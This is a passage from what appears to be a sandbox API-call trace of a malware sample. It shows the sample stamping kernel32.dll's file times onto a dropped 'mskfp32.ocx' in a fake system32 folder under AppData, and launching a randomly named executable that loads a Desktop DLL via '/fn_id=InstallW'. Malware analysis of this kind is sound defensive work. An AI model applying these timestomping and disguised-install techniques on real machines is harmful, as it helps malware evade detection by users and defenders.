lpBuffer=0x194f850, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.080] wsprintfA (in: param_1=0x194f850, param_2="%s\\%s" | out: param_1="C:\\Windows\\system32\\kernel32.dll") returned 32 [0052.080] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0052.080] GetFileTime (in: hFile=0x118, lpCreationTime=0x194f848, lpLastAccessTime=0x194f840, lpLastWriteTime=0x194f838 | out: lpCreationTime=0x194f848*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x194f840*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x194f838*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0052.080] CloseHandle (hObject=0x118) returned 1 [0052.080] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\mskfp32.ocx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0052.080] SetFileTime (hFile=0x118, lpCreationTime=0x194f848, lpLastAccessTime=0x194f840, lpLastWriteTime=0x194f838) returned 1 [0052.080] CloseHandle (hObject=0x118) returned 1 [0052.080] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0052.080] wsprintfA (in: param_1=0x194f848, param_2="%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0052.080] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\mskfp32.ocx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0052.080] SetFileTime (hFile=0x118, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78) returned 1 [0052.080] CloseHandle (hObject=0x118) returned 1 [0052.081] Sleep (dwMilliseconds=0x5265c00) Thread: id = 166 os_tid = 0xed4 Thread: id = 203 os_tid = 0x810 [0082.009] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0082.009] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0082.010] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0082.010] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0082.010] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0082.010] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0082.010] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0082.010] GetCurrentThreadId () returned 0x810 [0149.011] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0149.011] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 Thread: id = 204 os_tid = 0x820 [0082.011] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0082.012] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0082.012] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0082.012] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0082.012] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0082.012] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0082.012] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0082.012] GetCurrentThreadId () returned 0x820 Process: id = "9" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f780" os_pid = "0xab8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=InstallW" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 522 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 523 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 524 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 525 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 526 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 527 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 528 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 529 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 530 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 531 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 532 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 533 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 534 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 535 start_va = 0x580000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 536 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 537 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 538 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 539 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 540 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 541 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 542 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 543 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 544 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 545 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 546 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 547 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 548 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 549 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 550 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 551 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 552 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 553 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 554 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 555 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 556 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 557 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 558 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 559 start_va = 0x1200000 end_va = 0x12fffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 562 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 563 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 564 start_va = 0x1200000 end_va = 0x128ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 565 start_va = 0x12f0000 end_va = 0x12fffff entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 2978 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2979 start_va = 0x14c0000 end_va = 0x15bffff entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 2980 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Thread: id = 23 os_tid = 0xabc [0031.335] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f4e4 | out: lpSystemTimeAsFileTime=0x24f4e4*(dwLowDateTime=0xe065d6f0, dwHighDateTime=0x1d3dfba)) [0031.335] GetCurrentProcessId () returned 0xab8 [0031.335] GetCurrentThreadId () returned 0xabc [0031.335] GetTickCount () returned 0x16ff1 [0031.335] QueryPerformanceCounter (in: lpPerformanceCount=0x24f4dc | out: lpPerformanceCount=0x24f4dc*=359936677) returned 1 [0031.336] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.336] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0031.336] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0031.336] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0031.336] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0031.336] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.336] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.336] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.336] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.336] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.336] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.337] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.337] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.337] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.337] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.337] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.337] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.337] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.337] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.338] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.338] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.338] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.338] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.338] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.338] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.338] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.338] GetCurrentThreadId () returned 0xabc [0031.338] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=InstallW" [0031.338] GetEnvironmentStringsW () returned 0x377878* [0031.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0031.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x12f09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0031.339] FreeEnvironmentStringsW (penv=0x377878) returned 1 [0031.339] GetStartupInfoA (in: lpStartupInfo=0x24f434 | out: lpStartupInfo=0x24f434*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0031.339] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0031.339] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0031.339] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0031.339] SetHandleCount (uNumber=0x20) returned 0x20 [0031.339] GetLastError () returned 0x0 [0031.339] SetLastError (dwErrCode=0x0) [0031.350] GetLastError () returned 0x0 [0031.350] SetLastError (dwErrCode=0x0) [0031.350] GetLastError () returned 0x0 [0031.350] SetLastError (dwErrCode=0x0) [0031.350] GetACP () returned 0x4e4 [0031.350] GetLastError () returned 0x0 [0031.350] SetLastError (dwErrCode=0x0) [0031.350] IsValidCodePage (CodePage=0x4e4) returned 1 [0031.350] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x24f414 | out: lpCPInfo=0x24f414) returned 1 [0031.350] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x24eee0 | out: lpCPInfo=0x24eee0) returned 1 [0031.350] GetLastError () returned 0x0 [0031.350] SetLastError (dwErrCode=0x0) [0031.350] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x24ee70 | out: lpCharType=0x24ee70) returned 1 [0031.350] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f2f4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.350] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f2f4, cbMultiByte=256, lpWideCharStr=0x24ec58, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0031.350] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x24eef4 | out: lpCharType=0x24eef4) returned 1 [0031.350] GetLastError () returned 0x0 [0031.350] SetLastError (dwErrCode=0x0) [0031.350] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0031.350] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f2f4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.350] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f2f4, cbMultiByte=256, lpWideCharStr=0x24ec28, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā") returned 256 [0031.350] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0031.350] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x24ea18, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0031.350] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x24f1f4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿbÐòõ,ô$", lpUsedDefaultChar=0x0) returned 256 [0031.350] GetLastError () returned 0x0 [0031.350] SetLastError (dwErrCode=0x0) [0031.350] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f2f4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.351] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f2f4, cbMultiByte=256, lpWideCharStr=0x24ec48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 